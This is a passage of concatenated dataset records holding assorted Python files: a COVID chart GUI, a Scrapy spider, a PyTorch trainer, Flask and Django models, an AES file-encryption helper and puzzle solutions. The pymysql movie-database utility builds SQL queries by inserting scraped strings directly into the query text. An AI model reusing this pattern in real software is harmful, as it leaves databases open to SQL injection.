data and display it\ndef getCovidData():\n cases = []\n confirmed = []\n active = []\n deaths = []\n recovered = []\n\n\n #using try and except to run program without errors\n try:\n #updating window\n window.update()\n #getting countries names entered by the user\n countries = data.get()\n #removing white spaces from the start and the end of the string\n country_names = countries.strip()\n #replacing white spaces with commas inside the string\n country_names = country_names.replace(\" \", \",\")\n #spliting the string to store names of countries as a list\n country_names = country_names.split(\",\")\n\n #for loop to get all countries data\n for i in country_names:\n # appending countries data one by one\n cases.append(covid.get_status_by_country_name(i))\n #updating the window\n window.update()\n\n #getting country data stored as a dictionary in the list cases\n for x in cases:\n #storing data\n confirmed.append(x[\"confirmed\"])\n active.append(x[\"active\"])\n deaths.append(x[\"deaths\"])\n recovered.append(x[\"recovered\"])\n\n #making the color information on scaleusing patches\n confirmed_patch = mpatches.Patch(color='green', label='confirmed')\n recovered_patch = mpatches.Patch(color='red', label='recovered')\n active_patch = mpatches.Patch(color='blue', label='active')\n deaths_patch = mpatches.Patch(color='black', label='deaths')\n\n #ploting the scale on graph using legend()\n plt.legend(handles=[confirmed_patch, recovered_patch, active_patch, deaths_patch])\n\n #showing the data using graphs\n for i in range(len(country_names)):\n plt.bar(country_names[i], confirmed[i], color='green')\n if recovered[i] > active[i]:\n plt.bar(country_names[i], recovered[i], color='red')\n plt.bar(country_names[i], active[i], color='blue')\n else:\n plt.bar(country_names[i], active[i], color='blue')\n plt.bar(country_names[i], recovered[i], color='red')\n plt.bar(country_names[i], deaths[i], color='black')\n\n #the graph\n plt.title('Current Covid Cases')\n plt.xlabel('Contry Name')\n plt.ylabel('Cases(in millions)')\n plt.show()\n except Exception as e:\n #this will run when the user enters incorrect details\n data.set(\"Invalid entry! 
Please enter correct details\")\n\nLabel(window, text=\"Enter all countries names\\nfor whom you want to get\\ncovid-19 data\", font=('Comic Sans MS', 15, \"bold\" ),fg=\"white\", bg=\"#416C7B\").pack()\nspace = Label(window,text=\"\",font=('Comic Sans MS', 15, \"bold\" ),bg=\"#416C7B\").pack()\n\nLabel(window, text=\"Seperate country names using comma or space(not both)\", font=('Comic Sans MS',9, \"bold\"), fg=\"white\", bg=\"#416C7B\").pack()\nLabel(window, text=\"Enter country name:\",font=('Comic Sans MS',8, \"bold\"),fg=\"white\", bg=\"#416C7B\").pack()\n\ndata = StringVar()\ndata.set(\"\")\n\nentryField = Entry(window, textvariable=data, width=50).pack()\nButton(window, text=\"Get Data\", cursor=\"hand2\",bg=\"blue\", fg=\"white\", command=getCovidData).pack()\n\nspace = Label(window,text=\"\",font=('Comic Sans MS', 15, \"bold\" ),bg=\"#416C7B\").pack()\n\ndevName = Label(window,text=\"Copyright © 2021 Edem\", fg=\"white\",bg=\"#416C7B\", font=(\"Comic Sans MS\",10,\"bold\")).pack()\n \n\nwindow.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"99466003","text":"#!/usr/bin/env python3\n#Winter Term Project Version1\n\nclass Creator2():\n def __init__(self,day,month,year,name):\n self.day=day\n self.month=month\n self.year=year\n self.name=name\n def getFirstName(self):\n space=self.name.index(\" \")\n firstName=self.name[0:space]\n return firstName\n def getLastName(self):\n space=self.name.index(\" \")\n lastName=self.name[space+1:]\n return lastName\n def getDay(self):\n return self.day\n def getMonth(self):\n return self.month\n def getYear(self):\n return self.year\n def countSet(self,name):\n alpha=\"0ABCDEFGHIJKLMNOPQRSTUVWXYZ0abcdefghijklmnopqrstuvwxyz\"\n count=alpha.index(name[0:1])\n return count%27\n def birthTotal(self):\n if self.year<10:\n return self.month+((self.day//10)+(self.day%10))+self.year\n else:\n return self.month+((self.day//10)+(self.day%10))+(self.year/10)\n def decimal(self):\n deci=0.00\n first=self.getFirstName()\n a=self.countSet(first)\n c=a\n deci+=c\n last=self.getLastName()\n b=self.countSet(last)\n d=(float)(b*.1)\n deci+=d;\n return deci; \n def FinalNum(self):\n FinNum=self.birthTotal()*self.decimal();\n if (FinNum>809.0):\n return round(FinNum%809);\n return round(FinNum);\n def isShiny(self): \n x=len(self.name)-1\n if(x%10==0):\n x=x//10\n u=self.FinalNum()//10\n d=u%10\n return x==u%10\n o=self.FinalNum()%10\n return x==self.FinalNum()%10\n def shinyConfirm(self):\n if (self.isShiny()==True):\n return \"This pokemon is Shiny!\"\n return \"\"\n def region(self):\n if (self.FinalNum()<=151):\n return \"Kanto Region\"\n elif(self.FinalNum()>=152 and self.FinalNum()<=251):\n return \"Johto Region\"\n elif(self.FinalNum()>=252 and self.FinalNum()<=386):\n return \"Hoenn Region\"\n elif(self.FinalNum()>=387 and self.FinalNum()<=493):\n return \"Sinnoh Region\"\n elif(self.FinalNum()>=494 and self.FinalNum()<=649):\n return \"Unova Region\"\n elif(self.FinalNum()>=650 and self.FinalNum()<=721):\n return \"Kalos Region\"\n elif(self.FinalNum()>=722 and self.FinalNum()<=809):\n return \"Alola Region\"\n return \"???\"\n","sub_path":"creator2.py","file_name":"creator2.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"118557481","text":"import os\n\nimport numpy as np\nimport torch\nfrom torch import 
optim\nfrom tqdm import tqdm\nimport segmentation_models_pytorch as smp\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom lib import data\nfrom lib import models\n\nclass Trainer:\n '''\n Trainer for PyTorch models\n\n Arguements:\n model (toch.Module) -- Torch model\n checkpoint_path (str) -- Path to save checkpoints\n data_train(valid/test) -- Path to data directory\n masks_train(vaid/test) -- Path to masks\n preprocessing -- Preprocessing function\n augmentations -- Augmentation function\n optimizer -- Custom optimizer for model\n\n Methods:\n fit(epo, batch_size, verbose) -- training function\n get_test_score() -- get score on test data if avalible \n '''\n def __init__(self, model, checkpoint_path, \n data_train, masks_train,\n data_valid, masks_valid,\n preprocessing=None,\n augmentations=None,\n optimizer=None, device=\"cpu\",\n data_test=None, masks_test=None,\n ):\n self.model = model\n self.checkpoint_path = checkpoint_path\n self.optimizer = optimizer\n self.device = device\n\n self.train = data.Dataset(data_train, masks_train,\n preprocessing=preprocessing,\n augmentation=augmentations)\n self.valid = data.Dataset(data_valid, masks_valid)\n if data_test:\n self.test = data.Dataset(data_test, masks_test)\n else: self.test=None\n \n def fit(self, epo, batch_size, verbose=0):\n '''\n Fit model\n\n Arguements:\n epo (integer) -- Numbers of epochs\n batch_size (integer) -- Number of images in training data batch\n verbose (integer) -- 0 for no output\n 1 for only epo output\n 2 for full output\n '''\n # defime metrics\n criterion = smp.utils.losses.BCEDiceLoss()\n metrics = [\n smp.utils.metrics.IoUMetric(),\n smp.utils.metrics.FscoreMetric()\n ]\n \n # configure data loaders\n train_loader = DataLoader(self.train, batch_size=batch_size, \n shuffle=True, num_workers=0)\n val_loader = DataLoader(self.valid, batch_size=1, \n shuffle=False, num_workers=0)\n \n # configure default optimizer\n if self.optimizer is None:\n self.optimizer = optim.Adam(self.model.parameters(), lr=1e-4)\n \n # configure training process\n train_epoch = smp.utils.train.TrainEpoch(\n self.model, \n loss=criterion, \n metrics=metrics, \n optimizer=self.optimizer,\n device=self.device,\n verbose=True if verbose==2 else False,\n )\n val_epoch = smp.utils.train.ValidEpoch(\n self.model, \n loss=criterion, \n metrics=metrics, \n device=self.device,\n verbose=True if verbose==2 else False,\n )\n\n # training loop\n logs = []\n max_score = 0\n iterator = range(epo) if verbose!=1 else tqdm(range(epo))\n for i in iterator:\n if verbose==2:\n print(f'\\nEpoch: {i}')\n\n train_logs = train_epoch.run(train_loader)\n valid_logs = val_epoch.run(val_loader)\n \n logs.append((train_logs, valid_logs))\n\n # save best model\n if max_score < valid_logs['iou']:\n max_score = valid_logs['iou']\n torch.save(self.model, self.checkpoint_path)\n if verbose==2:\n print('Model saved!')\n print(f\"Training completed sucessfully.\\nBest model IoU: {max_score}\")\n return max_score, logs\n\n def get_test_score(self):\n '''\n Calculate test score\n '''\n if self.test is None:\n raise ValueError(\"No test data provided\")\n # defime metrics\n criterion = smp.utils.losses.BCEDiceLoss()\n metrics = [\n smp.utils.metrics.IoUMetric(),\n smp.utils.metrics.FscoreMetric()\n ]\n # configure data loader\n val_loader = DataLoader(self.test, batch_size=1, \n shuffle=False, num_workers=0)\n # perform testing\n val_epoch = smp.utils.train.ValidEpoch(\n self.model, \n loss=criterion, \n metrics=metrics, \n device=self.device,\n verbose=True\n )\n 
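# run a single validation epoch over the held-out test loader and collect the configured loss/metric logs\n 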
score = val_epoch.run(val_loader)\n return score\n","sub_path":"human_segmentation/lib/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"330157212","text":"\"\"\"\nThe string \"PAYPALISHIRING\" is written in a zigzag pattern on a given number of rows like this: (you may want to display this pattern in a fixed font for better legibility)\n\nP A H N\nA P L S I I G\nY I R\nAnd then read line by line: \"PAHNAPLSIIGYIR\"\n\nWrite the code that will take a string and make this conversion given a number of rows:\n\nstring convert(string s, int numRows);\nExample 1:\n\nInput: s = \"PAYPALISHIRING\", numRows = 3\nOutput: \"PAHNAPLSIIGYIR\"\nExample 2:\n\nInput: s = \"PAYPALISHIRING\", numRows = 4\nOutput: \"PINALSIGYAHRPI\"\nExplanation:\n\nP I N\nA L S I G\nY A H R\nP I\n\"\"\"\n\nclass Solution:\n def convert(self, s, numRows):\n if s == \"\":\n return s\n if numRows == 1:\n return s\n if numRows >= len(s):\n return s\n step = 1\n pos = 1\n lines = {}\n for c in s:\n if pos not in lines:\n lines[pos] = c\n else:\n lines[pos] += c\n pos += step\n if pos == 1 or pos == numRows:\n step *= -1\n\n result = \"\"\n for i in range(1, numRows + 1):\n try:\n result += lines[i]\n except:\n return result\n return result\n\ndef main():\n testcases=[]\n testcases.append((\"\", 1))\n testcases.append((\"A\", 3))\n testcases.append((\"AB\", 1))\n testcases.append((\"PAYPALISHIRING\", 3))\n testcases.append((\"PAYPALISHIRING\", 4))\n sol = Solution()\n for case in testcases:\n s, numRows = case\n print(\"s:{} numRows:{}\".format(s, numRows))\n ans = sol.convert(s, numRows)\n print('s:{} result:{}'.format(s, ans))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"DSA_CodingChallenge/python/Leetcode_ZigZagConversion_02.py","file_name":"Leetcode_ZigZagConversion_02.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"268835360","text":"# -*- coding: utf-8 -*-\n\"\"\"需要携带UA\"\"\"\n\"\"\"\n爬取西班牙和德国十年期国债率差对应的数据\n\"\"\"\nimport scrapy\nimport logging\nfrom indexhq.items import IndexhqCrawlItem\nfrom indexhq.common.global_data import GlobalData\n\nclass Index25InvestingSpider(scrapy.Spider):\n name = 'index25_investing'\n allowed_domains = ['cn.investing.com']\n start_urls = ['https://cn.investing.com/rates-bonds/government-bond-spreads']\n # 产品提供页面地址:http://www.stockq.org/index/VIX.php\n\n data = GlobalData()\n\n ita_atrade_xpath = '//*[@id=\"pair_23806\"]/td[3]/text()'\n ger_atrade_xpath = '//*[@id=\"pair_23693\"]/td[3]/text()'\n time_xpath = '//*[@id=\"pair_23738\"]/td[10]/text()'\n\n def parse(self, response):\n SCode = 'index25'\n item = IndexhqCrawlItem()\n\n spa_atrade = response.xpath(self.ita_atrade_xpath).extract_first().replace(',', '')\n ger_atrade = response.xpath(self.ger_atrade_xpath).extract_first().replace(',', '')\n atrade = float(spa_atrade) - float(ger_atrade)\n yclose = self.data.opindex25 if isinstance(self.data.opindex25, float) else atrade\n # hqTTime = response.xpath(self.time_xpath).extract_first()\n # u'09:11:02'\n # marketTime = ''\n # indexdate = response.xpath(self.indexdate_xpath).extract_first()\n Weight = self.data.opweight[SCode]\n CTime = self.data.optime\n logging.warning(\"{}, SCode={}, atrade={}, yclose={}\".format(self.__class__.__name__, SCode, atrade, yclose))\n\n item['SCode'] = SCode\n item['ATrade'] = round(float(atrade), 4)\n item['YClose'] = 
round(float(yclose), 4)\n item['Weight'] = Weight\n item['CTime'] = CTime\n yield item","sub_path":"indexhq/spiders/index25_investing.py","file_name":"index25_investing.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"605560208","text":"import pymysql\n\n\nconnect = pymysql.Connect(host='localhost', user='root', password='', db='kinopoisk')\ncursor = connect.cursor()\n\n\ndef check_film(kino_id):\n cursor.execute(f'SELECT * FROM movies WHERE kinopoisk_id = {str(kino_id)}')\n return len(cursor.fetchall())\n\n\ndef insert_categories(categories, id_of_movies):\n \"\"\"\n Добавление категорий в БД, тех которых не хватает, и сразу связывание их с фильмом.\n :param categories: категории\n :param id_of_movies: айди добавленного фильма\n :return:\n \"\"\"\n if len(categories) > 20:\n return\n cursor.execute('INSERT IGNORE INTO categories (title_of_category) VALUES (\"' + '\"), (\"'.join(categories) + '\")')\n\n connect.commit()\n\n cursor.execute('SELECT id '\n 'FROM categories '\n 'WHERE title_of_category IN (\"' + '\", \"'.join(categories) + '\")')\n ids_of_categories = tuple(str(id_of_movies) + ', ' + str(row[0]) for row in cursor.fetchall())\n cursor.execute('INSERT INTO mov_with_cat (id_of_mov, id_of_cat) VALUES (' + '), ('.join(ids_of_categories) + ')')\n connect.commit()\n\n\ndef insert_year(year):\n cursor.execute(f'INSERT IGNORE INTO years (title_of_year) VALUES ({year})')\n connect.commit()\n\n cursor.execute('SELECT id '\n 'FROM years '\n f'WHERE title_of_year = {year}')\n return cursor.fetchall()[0][0]\n\n\ndef insert_directors(directors, id_of_movies):\n \"\"\"\n Добавление категорий в БД, тех которых не хватает, и сразу связывание их с фильмом.\n :param directors: режисеры\n :param id_of_movies: айди добавленного фильма\n :return:\n \"\"\"\n cursor.execute('INSERT IGNORE INTO directors (title_of_director) VALUES (\"' + '\"), (\"'.join(directors) + '\")')\n connect.commit()\n\n cursor.execute('SELECT id '\n 'FROM directors '\n 'WHERE title_of_director IN (\"' + '\", \"'.join(directors) + '\")')\n ids_of_directors = tuple(str(id_of_movies) + ', ' + str(row[0]) for row in cursor.fetchall())\n cursor.execute('INSERT INTO mov_with_dir (id_of_mov, id_of_dir) VALUES (' + '), ('.join(ids_of_directors) + ')')\n connect.commit()\n\n\ndef insert_new_movie(data):\n \"\"\"\n Добавление фильма\n :param data: инфа о фильма\n :return:\n \"\"\"\n id_of_year = insert_year(data[3])\n\n cursor.execute('INSERT INTO movies (movie_name, `description`, id_of_year, rating, slug, poster, movie_or_serial, kinopoisk_id) '\n 'VALUES ( \"{}\", \"{}\", {}, \"{}\", \"{}\", \"{}\", \"{}\", {})'.format(data[0], data[1].replace('\"', \"'\"), str(id_of_year), data[4], data[6], data[7], str(data[8]), data[9][data[9].find('/') + 1:]))\n connect.commit()\n\n cursor.execute('SELECT MAX(id) FROM movies')\n id_of_movie = cursor.fetchall()[0][0]\n insert_categories(data[2], id_of_movie)\n insert_directors(data[5], id_of_movie)\n\n\ndef get_large_year():\n cursor.execute('SELECT kinopoisk_id FROM `movies` WHERE id_of_year IN (SELECT id FROM years WHERE title_of_year > \"2020\" OR title_of_year < \"1900\")')\n return tuple('film/' + str(row[0]) for row in cursor.fetchall())\n\n\ndef update_years(kinopoisk_id, year):\n cursor.execute(f'UPDATE movies SET id_of_year = (SELECT id FROM years WHERE title_of_year = \"{year}\") WHERE kinopoisk_id = {kinopoisk_id}')\n connect.commit()\n\n\nif __name__ == '__main__':\n 
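# no command-line behaviour yet; a quick manual check could be, for example, print(check_film(123)) with an illustrative kinopoisk id\n 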
pass\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"423269633","text":"import math\n\ndef find_divider(n):\n if n % 2 == 0 and n > 2:\n return 2\n for i in range(3, int(math.sqrt(n)) + 1, 2):\n if n % i == 0:\n return i\n return -1\n\ndef to_int_with_base(string, base):\n ret = 0\n for i in range(len(string)):\n if string[i] == \"1\":\n ret += base ** (len(string)-1-i)\n return ret\n\ndef gen_string(index, length):\n format_rule = \"0\" + str(length-2) + \"b\"\n return \"1\" + format(index, format_rule) + \"1\"\n\nfin = open(\"small.in\", 'r')\nfout = open(\"small.out\", 'w')\n\nt = int(fin.readline())\n\nfor cases in range(1, t+1):\n raw_in = fin.readline().split()\n jamcoin_length, jamcoin_count = int(raw_in[0]), int(raw_in[1])\n fout.write(\"Case #%d:\\n\" % cases)\n\n jamcoins = 0\n for i in range(2**(jamcoin_length-2)):\n if jamcoins >= jamcoin_count:\n break\n candidate = gen_string(i, jamcoin_length)\n dividers = []\n for j in range(2, 11):\n divider = find_divider(to_int_with_base(candidate, j))\n if divider == -1:\n break\n dividers.append(divider)\n if len(dividers) == 9:\n # Candidate is jamcoin!\n jamcoins += 1\n fout.write(\"%s %s\\n\" % (candidate, ' '.join(map(str, dividers))))\n\nfin.close()\nfout.close()\n","sub_path":"codes/CodeJamCrawler/16_0_3_neat/16_0_3_hama_1.py","file_name":"16_0_3_hama_1.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"115010166","text":"from flask_appbuilder import ModelView\nfrom flask_appbuilder.models.sqla.interface import SQLAInterface\nfrom app import appbuilder\nfrom flask_appbuilder import ModelView,BaseView,expose, action, has_access\n\nfrom app import db\nimport random\nimport string\n##########\nfrom app.sustratos.models import Sustrato\nfrom app.unidadmedidas.models import Unidadmedida \nfrom flask_appbuilder.fields import AJAXSelectField\nfrom flask_appbuilder.fieldwidgets import Select2AJAXWidget, Select2SlaveAJAXWidget, Select2Widget\nfrom flask_appbuilder.models.sqla.interface import SQLAInterface\nfrom wtforms.ext.sqlalchemy.fields import QuerySelectField\nfrom wtforms import validators\n#### para la descarga + timestamp en nombre del archivo\nfrom flask_appbuilder import ModelView,expose,action\nfrom flask import redirect, send_file\nimport csv\nfrom io import BytesIO\nimport pandas as pd\nfrom datetime import datetime\nimport pytz\ntz = pytz.timezone('America/Argentina/Buenos_Aires')\nfecha = datetime.now(tz)\nfecha = fecha.strftime('%Y-%m-%d %H:%M')\nfecha = str(fecha)\n#############\n\n\nclass SustratoView(ModelView):\n datamodel = SQLAInterface(Sustrato)\n # estructura -> 'nombreAtributoModel':'nombre_a_Mostrar_en_Columna'\n label_columns = {\"nombreSustrato\":\"Sustrato\",\"descrpcionSustrato\":\"Descripcion\",\"unidadmedida\":\"Unidad de Medida\"}\n\n list_columns = [\"nombreSustrato\",\"descrpcionSustrato\",\"unidadmedida\"] #lista de columnas a mostrar en el listado\n\n # lista de campos y atributos a mostrar en el \"show\" de cada registro\n\n list_title = 'Lista de Sustratos'\n show_title = 'Detalle Sustrato'\n add_title = 'Nuevo Sustrato'\n edit_title = 'Editar Sustrato'\n\n base_permissions = ['can_list', 'can_show']\n @action(\"down_excel\",\"Descargar lista\",\"\",\"fa-file-excel-o\",single=False)\n def down_excel(self, items):\n output = BytesIO()\n list_items = list()\n 
excel_columns = SustratoView.list_columns\n\n for item in items:\n row = dict()\n for col,colname in self.label_columns.items():\n if col in excel_columns:\n row[colname] = str(getattr(item, col))\n else:\n pass\n list_items.append(row)\n\n df = pd.DataFrame(list_items)\n writer = pd.ExcelWriter(output, engine='xlsxwriter')\n df.to_excel(writer, 'data', index=False)\n writer.save()\n output.seek(0)\n\n return send_file(output, attachment_filename='lista_motores' +fecha+ '.xlsx', as_attachment=True)\n\n\n\nsustrato_builder = appbuilder.add_view(\n SustratoView,\n \"Sustrato\",\n icon=\"fa-balance-scale\",\n category=\"Sustrato\",\n category_icon=\"fa-industry\"\n)\n\nclass mermaView(BaseView):\n @expose('/chartMerma')\n @has_access\n def method3(self):\n url = \"/chartMerma\"\n return url\n\n \nchart_merma_builder = appbuilder.add_view(\n mermaView,\n \"Merma\",\n icon='fa-area-chart' ,\n href=\"/chartMerma\", \n category='Charts' ,\n category_icon=\"fa-area-chart\")","sub_path":"app/sustratos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"294120688","text":"from flask.ext.assets import Bundle\n\nfrom flask_spirits import spirits\n\n\njs_public = Bundle(\n spirits.js_jquery,\n spirits.js_bootstrap,\n spirits.js_magnific,\n spirits.js_davis,\n 'js/index.js'\n)\n\ncss_public = Bundle(\n spirits.css_bootstrap,\n spirits.css_magnific,\n 'css/bootstrap.cosmo.css',\n 'css/bootstrap.css',\n 'css/index.css'\n)","sub_path":"mongoyurts/assets.py","file_name":"assets.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"484884648","text":"\"\"\"This module contains questions that are asked during the rating process.\nIt also contains a model to link those questions to a rating decision job.\n\"\"\"\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom .rating_decision import RatingDecision\n\nfrom simple_history.models import HistoricalRecords\n\n\nclass Stage(models.Model):\n\n def __str__(self):\n return '%s' % self.name\n\n name = models.CharField(\n db_index=True,\n max_length=100,\n blank=False,\n null=False\n )\n\n\nclass Question(models.Model):\n \"\"\"Model to represent the process that follows upon a rating decision\n that has been approved by the chair.\"\"\"\n\n def __str__(self):\n return '%s | %s | %s' % (\n self.stage,\n self.is_enabled,\n self.question,\n )\n\n stage = models.ForeignKey(\n Stage,\n on_delete=models.PROTECT,\n )\n\n is_enabled = models.BooleanField(default=False)\n\n question = models.CharField(\n db_index=True,\n max_length=255,\n blank=False,\n null=False\n )\n\n\nclass ControlQuestion(models.Model):\n \"\"\"Model to link a question with a rating decision.\"\"\"\n\n # Add version history to the model\n history = HistoricalRecords()\n\n class Meta:\n ordering = ('rating_decision', 'question__question',)\n\n def __str__(self):\n return '%s | %s | Answer: %s' % (\n self.rating_decision,\n self.question,\n self.answer_correct\n )\n\n # Link back to the RatingDecision\n rating_decision = models.ForeignKey(\n RatingDecision,\n on_delete=models.PROTECT,\n )\n\n answered_by = models.ForeignKey(\n User,\n on_delete=models.PROTECT,\n related_name=\"control_question_answered_by\",\n null=True,\n blank=True\n )\n\n # On what date and time was 
the rating published\n answered_on = models.DateTimeField(\n null=True,\n blank=True\n )\n\n question = models.ForeignKey(\n Question,\n on_delete=models.PROTECT\n )\n\n answer_correct = models.BooleanField(default=False)\n\n\n@receiver(post_save, sender=RatingDecision)\ndef create_questions(sender, instance, created, **kwargs):\n \"\"\"Create a process object whenever a rating decision\n object has been created.\"\"\"\n\n if created:\n\n active_questions = Question.objects.filter(is_enabled=True)\n\n for row in active_questions:\n\n ControlQuestion.objects.create(rating_decision=instance,\n question=row)\n","sub_path":"ncr_website/rating_process/models/questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"217979371","text":"import math\nimport random\n\n\nclass Individuo:\n\n def __init__(self, bits_x, min_x, max_x, bits_y, min_y, max_y): # Construtor da classe\n self.bits_x = bits_x\n self.min_x = min_x\n self.max_x = max_x\n \n self.bits_y = bits_y\n self.min_y = min_y\n self.max_y = max_y\n self.no_genes = self.bits_x + self.bits_y # tamanho da cadeia\n\n self.fitness = 0\n self.fitnessInverso = 0\n\n # Função para gerar o genoma (vetor binário) aleatório\n @staticmethod\n def random_genome(size):\n return [random.randrange(0, 2) for _ in range(0, size)]\n\n # função que calcula o valor de q, dado max, min e número de bits\n @staticmethod\n def getQ(max, min, n):\n return (max - min) / ((2**n) - 1)\n\n # função que calcula o número de bits necessários, dado max, min e q\n @staticmethod\n def getN(max, min, q):\n return math.floor(math.log(((max - min) / q) + 1) / math.log(2))\n\n # função que converte uma cadeia de binários em um número real\n @staticmethod\n def bin_dec(cadeia, inicio, fim):\n res = 0\n aux = 0\n for i in range(fim, inicio - 1, -1):\n res = res + (cadeia[i] * (2**aux))\n aux = aux + 1\n return res\n\n def getFitness(self): # funcao hipotetica de fitness\n pi = math.pi\n x_real = self.min_x + (self.getQ(self.max_x, self.min_x, self.bits_x)\n * self.bin_dec(self.genotipo, 0, self.bits_x - 1))\n y_real = self.min_y + (self.getQ(self.max_y, self.min_y, self.bits_y)\n * self.bin_dec(self.genotipo, self.bits_x, (self.bits_x + self.bits_y) - 1))\n return 20 + (x_real **2) + (y_real**2) - (10 * (math.cos(2 * pi * x_real) + math.cos(2 * pi * y_real)))\n\n def setCromossomoAleatorio(self):\n self.genotipo = self.random_genome(self.no_genes) # cadeia de bits\n\n # aplica o valor do fenotipo a funcao de fitness\n self.fitness = self.getFitness()\n self.fitnessInverso = 1 / (self.fitness + (10**-9))\n\n def setCromossomoPronto(self, crom):\n self.genotipo = crom\n\n # aplica o valor do fenotipo a funcao de fitness\n self.fitness = self.getFitness()\n self.fitnessInverso = 1 / (self.fitness + (10**-9))\n\n def imprime(self): # imprime a cadeia de bits\n letras = \"\"\n for i in range(self.no_genes):\n letras += str(self.genotipo[i])\n # print(self.genotipo[i], end=\"\", flush=True)\n print(letras)\n print('\\t', self.fitness)\n","sub_path":"Individuo.py","file_name":"Individuo.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"374283918","text":"\"\"\" A two layer NN with sigmoid output layer.\n\"\"\"\n\nimport numpy as np\n\n# Activation functions\ndef sigmoid(Z):\n\treturn 1/(1+np.exp(-Z))\n\ndef relu(Z):\n\treturn np.maximum(0, Z)\n\n# Initial setup: 
number of nodes in each layer\nn_input = 30\nn_hidden = 20\nn_output = 1\n\n# Metavariables\nlearning_rate = .001\nn_epochs = 1001\n\n# Random training data\nn_examples = 1000\nX = np.random.random((n_input, n_examples))\ny = np.random.randint(0, 2, n_examples)\n\n# Initialize weights and biasses\nW1 = np.random.random((n_hidden, n_input)) * .01 # now we don't have to transpose\nb1 = np.zeros((n_hidden, 1))\nW2 = np.random.random((n_output, n_hidden)) * .01\nb2 = np.zeros((n_output, 1))\n\n# Training\nfor epoch in range(n_epochs):\n\t# Forward propagation\n\tA0 = X\n\tZ1 = W1.dot(A0) + b1\n\tA1 = relu(Z1)\n\tZ2 = W2.dot(A1) + b2\n\tA2 = sigmoid(Z2)\n\n\t# Compute the cost\n\tcost = -np.mean(y * np.log(A2) + (1-y) * np.log(1-A2))\n\tif epoch % 100 == 0:\n\t\tprint('Epoch: {}, Cost: {}'.format(epoch, cost))\n\n\t# Back propagation: second layer\n\tdA2 = -np.divide(y, A2) + np.divide(1-y, 1-A2)\n\tdZ2 = dA2 * A2 * (1-A2)\n\tdW2 = 1/n_examples * np.dot(dZ2, A1.T)\n\tdb2 = 1/n_examples * np.sum(dZ2, axis=1, keepdims=True)\n\t# Back propagation: first layer\n\tdA1 = np.dot(W2.T, dZ2)\n\tdZ1 = dA1.copy()\n\tdZ1[A1 < 0] = 0 # derivative of relu\n\tdW1 = 1/n_examples * np.dot(dZ1, A0.T)\n\tdb1 = 1/n_examples * np.sum(dZ1, axis=1, keepdims=True)\n\t\n\t# Update the weights and biasses\n\tW1 -= learning_rate * dW1\n\tb1 -= learning_rate * db1\n\tW2 -= learning_rate * dW2\n\tb2 -= learning_rate * db2","sub_path":"neural-networks/twolayer_sigmoid.py","file_name":"twolayer_sigmoid.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"625860652","text":"'''加密解密模块'''\n\n# http://www.pycrypto.org/\n# https://www.dlitz.net/software/pycrypto/\n\nimport lzma\nimport pickle\nimport os.path\n\nimport config.information\n\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\n\nclass Crypt():\n '''加密类'''\n\n def __init__(self):\n pass\n\n def bytekey(self, key):\n '''密钥key 长度必须为16(AES-128),#24(AES-192),或者32 (AES-256)Bytes 长度'''\n return (key.encode(encoding=\"utf-8\") + b'\\x00' * 32)[0:32]\n\n def encrypt(self, key, btxt):\n '''加密'''\n bkey = self.bytekey(key)\n biv = Random.new().read(AES.block_size)\n cipher = AES.new(bkey, AES.MODE_CFB, biv)\n bcrypt = cipher.encrypt(btxt)\n return (biv, bcrypt)\n\n def decrypt(self, key, biv, bcrypt):\n '''解密'''\n bkey = self.bytekey(key)\n cipher = AES.new(bkey, AES.MODE_CFB, biv)\n return cipher.decrypt(bcrypt)\n\n def encryptfile(self, key, srcfile, destfile):\n '''加密文件'''\n with open(srcfile, 'rb') as srcf:\n srcdata = srcf.read()\n compressdata = lzma.compress(srcdata)\n outdata = self.encrypt(key, compressdata)\n with open(destfile, 'wb') as desf:\n pickle.dump(outdata, desf)\n\n def loadencryptfile(self, key, enctryptfile):\n '''载入加密文件并解密'''\n with open(enctryptfile, 'rb') as ecf:\n biv, bcrypt = pickle.load(ecf)\n compressdata = self.decrypt(key, biv, bcrypt)\n data = lzma.decompress(compressdata)\n return data\n\n def encryptpyfile(self, key, pyfile, pyname):\n '''加密py文件,并且放在加密py路径中'''\n destfile = os.path.join(\n config.information.get_crypt_py_path(), pyname + '.bin')\n self.encryptfile(key, pyfile, destfile)\n\n def loadencryptpyfile(self, key, pyname):\n '''载入加密的py文件'''\n eptpyfile = os.path.join(\n config.information.get_crypt_py_path(), pyname + '.bin')\n return self.loadencryptfile(key, eptpyfile)\n\n def encrypttxtfile(self, key, txtfile, txtname):\n 